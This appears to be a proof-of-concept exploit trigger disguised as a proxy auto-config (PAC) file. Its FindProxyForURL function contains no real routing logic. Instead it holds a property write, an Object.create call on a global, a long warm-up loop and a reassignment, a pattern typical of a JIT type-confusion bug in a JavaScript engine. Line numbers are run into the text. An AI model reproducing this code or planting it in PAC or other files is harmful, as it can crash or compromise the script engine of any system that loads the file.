1function FindProxyForURL(url, host){ 2 function opt() { 3 opt['x'] = 1.1; 4 try { 5 Object.create(object); 6 } catch (e) { 7 } 8 9 for (let i = 0; i < 100000; i++) { 10 11 } 12 } 13 14 opt(); 15 object = opt; 16 opt(); 17 18 return "DIRECT"; 19} 20 21var object;